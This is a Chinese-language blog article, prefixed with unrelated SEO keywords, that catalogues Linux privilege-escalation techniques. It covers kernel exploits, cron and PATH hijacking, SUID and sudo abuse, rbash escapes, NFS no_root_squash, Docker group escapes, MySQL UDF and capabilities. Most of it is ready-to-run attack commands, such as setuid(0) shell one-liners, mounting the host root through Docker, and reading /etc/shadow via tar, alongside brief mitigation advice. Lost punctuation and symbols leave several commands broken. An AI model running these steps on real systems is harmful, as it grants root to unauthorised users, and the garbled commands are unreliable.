免费推广网站平台排名,wordpress挣钱,谈谈你对网络营销的认识,商务网站平台建设预算1、内核漏洞提权
利用内核漏洞提取一般三个环节#xff1a;首先对目标系统进行信息收集#xff0c;获取系统内核信息及版本信息
第二步#xff0c;根据内核版本获取对应的漏洞以及exp
第三步#xff0c;使用exp对目标进行攻击#xff0c;完成提权
注#xff1a;此处可…1、内核漏洞提权
利用内核漏洞提取一般三个环节首先对目标系统进行信息收集获取系统内核信息及版本信息
第二步根据内核版本获取对应的漏洞以及exp
第三步使用exp对目标进行攻击完成提权
注此处可以利用脚本进行快速收集脚本在往期的文章中
脏牛内核漏洞提权的原理
在Linux内核的内存子系统处理私有只读内存映射的写时复制损坏的方式中发现了一种竞争状况一个没有特权的本地用户可以利用此漏洞获取对只读存储器映射的写访问权从而增加他在系统上的特权
Linux内核的内存子系统在处理写时拷贝Copy-on-Write)时存在条件竞争漏洞导致可以破坏私有只读内存映射。一个低权限的本地用户能够利用此漏洞获取其他只读内存映射的写权限所以有可能进一步导致提权漏洞。 2、定时任务提权
定时任务cron job是Linux系统中的一个守护进程用于调度重复任务通过配置crontab可以让系统周期性地执行某些命令或脚本由于cron通常以root特权运行如果可以修改其调度地任何脚本或二进制文件便可以使用root权限执行任意代码。
Linux系统的定时任务文件位于/etc/crontab和/etc/cron.d/目录下。
/etc/crontab是系统中最基本的定时任务文件它是一个文本文件包含了一些指定时间执行的命令。每行都有6个字段用空格或制表符隔开分别表示分钟、小时、日期、月份、星期几和要执行的命令。例如
# m h dom mon dow user command
*/5 * * * * root /usr/local/bin/checkdisk.sh
这个任务会在每个小时的每5分钟执行一次/usr/local/bin/checkdisk.sh脚本。
可以列出/etc的系统任务系统任务默认是root权限运行
ls -l /etc/cron*
如果运气好有权限能更改其中一个任务指定的脚本我们就可以往脚本里添加如反弹shell等指令从而提权
另外/etc/cron.d/目录下存放着由其他应用程序创建的定时任务文件这些文件的命名格式是任意的但它们的内容与/etc/crontab文件类似也包含了要执行的命令和执行的时间。
需要注意的是如果想在当前用户的定时任务中添加命令可以使用crontab -e命令来编辑该用户的定时任务文件该文件的路径是/var/spool/cron/用户名。
环境变量劫持
查看定时任务 发现定义了诸多环境变量如果其任务有未指定绝对路径的指令如
17 * * * * root shell.sh
而且在其环境变量路径中可以进行写入操作可以通过写入环境变量的靠前路径一个同名恶意文件从而导致环境变量劫持比如在/sbin 写入一个 反弹shell功能的shell.sh那么就可以造成提权 3、SUID提权
SUID设置用户ID是赋予文件的一种权限它会出现在文件拥有者权限的执行位上具有这种权限的文件会在其执行时使调用者暂时获得该文件拥有者的权限。为可执行文件添加suid权限的目的是简化操作流程让普通用户也能做一些高权限才能做的的工作。但是如果某些现有的二进制文件和实用程序具有SUID权限的话就可以在执行时将权限提升为root。
原理
SUID提权的原理与Linux进程的UID有关进程在运行的时候有以下三个UID
AReal UID执行该进程的用户的UID。Real UID只用于标识用户不用于权限检查。
BEffective UIDEUID进程执行时生效的UID。在对访问目标进行操作时系统会检查EUID是否有权限。一般情况下Real UID与EUID相同但在运行设置了SUID权限的程序时进程的EUID会被设置为程序文件属主的UID。
CSaved UID在高权限用户降权后保留的UID。
如果某个设置了SUID权限的程序运行后创建了shell那么shell进程的EUID也会是这个程序文件属主的UID如果属主为root便是一个root shell。root shell中运行的程序的EUID也都是0具备超级权限于是便实现了提权。
命令find / -perm -4000 -type f 2/dev/null find / -perm -us
-perm -4000查找权限为“4000”的文件其中“4000”是表示suid权限的数字。
-type f查找类型为文件的结果而不是目录或其他类型的文件。
find / -perm -4000 -type f -exec ls -l {} \;这个命令与第一个命令类似但使用了-exec选项它将在查找到具有suid权限的文件后执行一个ls -l命令以查看这些文件的详细信息。在-exec选项中{}表示查找到的每个文件的名称\;表示命令结束的标记。 4、SUDO滥用提权
sudo是linux系统管理指令是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具。
sudo使一般用户不需要知道超级用户的密码即可获得权限。首先超级用户将普通用户的名字、可以执行的特定命令、按照哪种用户或用户组的身份执行等信息登记在特殊的文件中通常是/etc/sudoers即完成对该用户的授权此时该用户称为“sudoer”
sudo -l是一个sudo命令的选项用于列出当前用户可以使用sudo命令执行的命令列表。它可以帮助用户了解自己可以使用sudo命令运行哪些命令和脚本以及这些命令和脚本可以带哪些参数。
当用户执行sudo -l时系统将检查sudoers文件中该用户的访问权限并列出该用户可以运行的所有命令和脚本。如果用户没有权限执行任何命令sudo -l命令将返回一条错误消息。如果用户有权限执行一些命令sudo -l命令将显示这些命令及其参数。
User bob may run the following commands on this host:(ALL : ALL) ALL(root) /usr/bin/apt-get update, /usr/bin/apt-get upgrade(bob) /usr/bin/vim, /usr/bin/tail, /usr/bin/less
这个输出表示用户bob可以执行所有命令包括以root用户身份运行的命令
也可以运行/usr/bin/apt-get update和/usr/bin/apt-get upgrade这两个命令
以及/usr/bin/vim、/usr/bin/tail和/usr/bin/less这三个命令但只有以bob用户身份运行。
为了避免sudo滥用管理员可以采取以下措施
限制用户对sudo的访问权限并仅允许他们执行必要的命令和参数。对于不安全的脚本和程序确保在执行它们之前进行严格的安全检查并将其限制在特定的目录中。定期更新系统和软件并在不使用的软件中禁用sudo权限。确保系统中的sudo二进制文件都是标准的并且只允许被可信用户和进程执行。
5、passwd/shadow密码提权
明文密码
/etc/passwd 默认所有用户可读但只有root可写。 /etc/passwd里的用户口令往往以x代替其加密后的密码会存入/etc/shadow里面/etc/shadow默认只有root可读。
但是有小概率情况明文密码就直接出现在/etc/passwd了如果有这个情况且root密码暴露在了passwd里那么就可以轻而易举提权了
passwd 可写
如果/etc/passwd 当前用户可写可以直接把root的密码改成一个明文密码从而达到提权目的
爆破shadow
如果/etc/shadow 可读可以用hashcat或者john暴力破解shadow文件
运气决定小概率事件~ 6、rbash绕过
在之前的靶机测试时遇到过需要进行绕过rbash是一个功能受限的bash环境在vulnhub的DC2中遇到限制可能有如下操作
cd 切换目录含有斜杠 / 的命令, 譬如 /bin/sh设置 PATH ENV 等环境变量使用 进行重定向binary 的运行. 通常 root 用户会手动创建 /bin/binary_file - /home/rbash_user/bin/binary_file 的软链接, 限制性地提供部分 binary_file 给 rbash_user 使用 在 bash 下 echo $SHELL, 可以获取当前环境是否是 rbash.
绕过方式
scp bypass
进入命令自带shell bypass
man,git config help,more,less,vim,vi,ftp,gdb等命令都有自己的shell我们只需在他们各自的shell中执行/bin/sh即可 一般都是在shell键入!/bin/sh来bypass rbash
下面这种方法也是可行的似乎仅vim)
:set shell/bin/bash
:shell
find bypasss
简单概括就是-exec执行一下find -exec /bin/bash \;
编程语言 bypass
python
如果python都可以用的话那就更轻松了os安排一下 似乎pty也行?没试
python -c import os;os.system(/bin/bash)
php
php -a 进入php shell
然后执行命令:exec(/bin/bash);
perl
perl -e exec /bin/sh;
ruby
ruby -e exec /bin/bash
cp bypass
直接用cp把/usr/bin里的命令复制过来就行了
直接更改PATH/SHELL变量
键入export -p 查看该用户的变量
如果PATH和SHELL变量存在写的权限直接可以写入进行bypass ssh bypass
原理是通过ssh链接当前IP的当前用户并启动/bin/bash
ssh usernameIp -t /bin/bash
7、查找密码
言简意赅到处翻找密码
文件内查找
grep --colorauto -rnw / -ie PASSWORD --coloralways 2 /dev/null
find . -type f -exec grep -i -I PASSWORD {} /dev/null \;
可以通过以上命令指定关键字在所有文件中搜索内容中有关键字的文件。
查找十分钟内更改过的文件
find / -mmin -10 2/dev/null | grep -Ev ^/proc (不显示^/proc文件或文件夹)
8、NFS提权
NFS网络文件系统是一种分布式文件系统协议NFS允许系统通过网络与其他人共享目录和文件NFS提权是指利用NFS协议漏洞通过共享文件系统中的文件获取本地特权的攻击方法。
NFS中的Root squashingroot_sqaush参数阻止对连接到NFS卷的远程root用户具有root访问权限当该参数设置为no_root_squash时登入NFS主机使用分享目录的使用者如果是root那么对于这个分享目录就具有root的权限。
查看“/etc /exports”文件发现/home/ubuntu/tmp文件是可共享的远程可以挂载且为no_root_squash
cat /etc/exports 如果有no_root_squash字样则说明root用户就会对共享目录拥有至高的权限控制就像是对本机的目录操作一样。
也就是说任何机器的root在此目录上都有最高权限。
在获得一台机器的root权限后可以通过nfs在另一台低权限机器上实现提权
mkdir /tmp/nfs
mount -o rw,vers3 10.10.10.10:/tmp /tmp/nfs 将本机上的/tmp/nfs 挂载到共享目录
cp /bin/bash /tmp/nfs/bash
chmod us /tmp/nfs/bash 设置共享目录上bash的suid
回到低权限机执行 /tmp/bash 完成提权
为了避免NFS提权攻击可以采取以下措施
限制NFS共享文件系统的访问权限并只允许可信用户和主机访问共享文件系统。不要将SUID root程序放在NFS共享文件系统上。对于具有SUID root权限的程序必须进行安全审计和防篡改检测以确保其完整性和安全性。在共享文件系统上启用访问控制列表ACLs和文件系统权限控制以确保只有受信任的用户才能访问共享文件系统中的文件。 9、Docker提权
除了利用Linux系统自带的工具进行提取还有利用大量存在风险的第三方工具进行提取例如docker
Docker有几个特性
1可免sudo使用docker默认情况下使用docker必须要有sudo权限对于一台机器多用户使用往往很多用户只有普通权限。为了让普通用户也可以使用Docker管理员将需要使用docker的用户添加到docker用户组(安装docker后默认会创建该组)中用户重新登录机器即可免sudo使用docker了。
2容器内用户权限不受限用户创建一个docker容器后容器内默认是root账户在不需要加sudo的情况下可以任意更改容器内的配置。正常情况下这种模式既可以保证一台机器被很多普通用户使用通过docker容器的隔离相互之前互不影响也给用户在容器内开放了充足的权限保证用户可以正常安装软件修改容器配置等操作。
3容器内外文件可映射docker提供了一个-v选项提供用户将容器外的host目录映射进容器内方便的进行容器内外的文件共享。
通过前期的渗透操作拿下user_docker的权限下面对其进行提权。首先运行一个容器docker run -it -v /etc:/etc ubuntu /bin/bash将宿主机的/etc目录直接映射进容器从而覆盖了容器内的/etc目录。由于linux系统上的本地用户信息主要记录在/etc/目录下比如两个常见文件/etc/passwd和/etc/group而在容器内当前用户有root权限于是可以随意修改这两个文件实现提权
修改/etc/passwd文件可更改root密码或者新增一个uid0的用户。
执行如下命令
docker run -v /:/mnt --rm -it crf_web1 chroot /mnt sh
然后在其中的/etc/passwd中写入一个root权限用户这里直接无密码了
修改/etc/group文件将当前用户添加到sudo组中。 10、Linux环境变量提权
PATH是Linux和类Unix操作系统中的一个环境变量它指定存储所有可执行程序的所有bin和sbin目录。当用户在终端上运行任何命令时它向shell请求在PATH变量的帮助下搜索可执行文件以响应用户执行的命令。超级用户通常还具有/sbin和/usr/sbin条目以便轻松执行系统管理命令。
查看PATH
echo $PATH
env | grep PATH
print $PATH如果找到一个suid权限的程序但是我们无法完成suid提权就可以试试搭配环境变量进行提权。
这个提权方法的思想是找到有suid的内部有system函数调用未指定路径的命令的文件。同时用户有修改自己环境变量的权限就可以通过劫持system函数里调用的脚本文件使其指向环境变量里自行创建的一个同名脚本文件那么这个自行创建的同名脚本文件就能以root权限运行了如果这个脚本文件里的命令是/bin/bash那么就相当于提权了。
首先在一个目录下创建如下文件
vim demo.c 然后 gcc demo.c -o shell 将其编译为可执行文件
然后 chmod us shell 为其增加suid权限
攻击者:首先使用下列指令搜寻suid权限文件
find / -perm -us -type f 2/dev/null 发现可疑目标执行一下看看 发现返回了ps命令的结果我们可以以此猜测这个文件内部 有 system(ps); 这条c语言代码。 遂可尝试环境变量提权
依次执行以下命令
cd /tmp
echo /bin/bash ps
export $PATH/tmp:$PATH 需要修改自身环境变量的权限但基本上都有这个权限
chmod 777 ./ps 没这条命令会导致提权失败
cd /home/const27
./shell 提权成功 11、Mysql UDF提权
UDF是用户自定义函数通过添加新函数对Mysql的功能进行扩充
利用条件mysql配置文件secure_file_priv为空具备数据库root权限
满足前提的情况下登录MySQL将准备好的dll文件上传到MySQL的plugin目录下然后利用dll文件创建执行系统命令的函数就能执行系统任意命令了。
mysql数据库的root权限
secure_file_priv的值为空。
如果mysql版本大于5.1udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/
如果mysql版本小于5.1 udf.dll文件在windows server 2003下放置于c:\windows\system32目录在windows server 2000下放置在c:\winnt\system32目录。
show variables like plugin%; #查看 plugin 目录 /usr/lib/mysql/plugin/
show global variables like secure%; # 查看secure_file_priv
select basedir; #查看mysql安装路径
show variables like %version_%; #确定平台是64位还是32位
insert into xiaoli values(load_file(/tmp/xiaoli.so));
然后利用dumpfile函数把文件导出outfile 多行导出dumpfile一行导出outfile会有特殊的转换而dumpfile是原数据导出
新建存储函数
select * from xiaoli into dumpfile /usr/lib/mysql/plugin/xiaoli.so;\
创建自定义函数do_system类型是integer别名soname文件名字然后查询函数是否创建成功
create function do_system returns integer soname xiaoli.so;
查看以下创建的函数
select * from mysql.func;
调用do_system函数来给find命令所有者的suid权限使其可以执行root命令 select do_system(chmod us /usr/bin/find); 12、capabilities
capabilities 是linux2.2后出现的产物它的出现一定程度上弥补了suid这种粗糙的权限管理机制但是capabilities 自身也有造成提权的安全隐患
capabilities 把root的权限细分了可以分别启用或者禁用。
在进行特权操作的时候如果euid不是root那么系统就会检查是否具有执行特权操作的对应capabilities 并以此为凭据决定特权操作是否能被执行。
如下是一些常见的特权操作及其对应capabilities 改变文件的所属者(chown()) CAP_CHOWN 向进程发送信号(kill(), signal()) CAP_KILL 改变进程的uid(setuid(), setreuid(), setresuid()等) CAP_SETUID trace进程(ptrace()) CAP_SYS_PTRACE 设置系统时间(settimeofday(), stime()等) CAP_SYS_TIME 忽略文件读及目录搜索的DAC访问限制 CAP_DAC_READ_SEARCH
关于capabilities的管理工具有如下:
getcapsetcapcapshfilecap
getcap 用于查询capabilitiessetcap用于设置capabilitiescapsh用于查当前shell进程的capabilitiesfilecap既能设置又能查询。
可以通过以下指令搜索设置了capabilities的可执行文件
getcap -r / 2/dev/null
实操
通过cap_setuid
cap_setuid 可以设置当前用户的euid可以通过此选项来进行一些提权。
以python为例 发现python3.8 有cap_setuid权限那么可以用以下指令进行提权
python -c import os; os.setuid(0); os.system(/bin/sh) 类似的有很多。
perl
perl -e use POSIX qw(setuid); POSIX::setuid(0); exec /bin/sh;
gdb
gdb -nx -ex python import os; os.setuid(0) -ex !sh -ex quit
php
php -r posix_setuid(0); system(/bin/sh);
python
python -c import os; os.setuid(0); os.system(/bin/sh)
rvim
需要支持python3模块。
rvim -c :py import os; os.setuid(0); os.execl(/bin/sh, sh, -c, reset; exec sh)
vim
需要支持python3模块。vim --version查询是否支持py3
vim -c :py import os; os.setuid(0); os.execl(/bin/sh, sh, -c, reset; exec sh)
通过CAP_DAC_READ_SEARCH
cap_dac_read_search可以绕过文件的读权限检查以及目录的读/执行权限的检查。
利用此特性可以读取系统中的敏感信息。
如果tar有此权限我们可以通过此来查看敏感文件内容。
tar cvf shadow.tar /etc/shadow //创建压缩文件tar -xvf shadow.tar //解压缩cd etc //进入解压缩的目录chmod r shadow //赋予读权限cat shadow | grep root //查看shadow文件的内容
总结
此篇是对以往的Linux主机提权方式进行总结温故知新
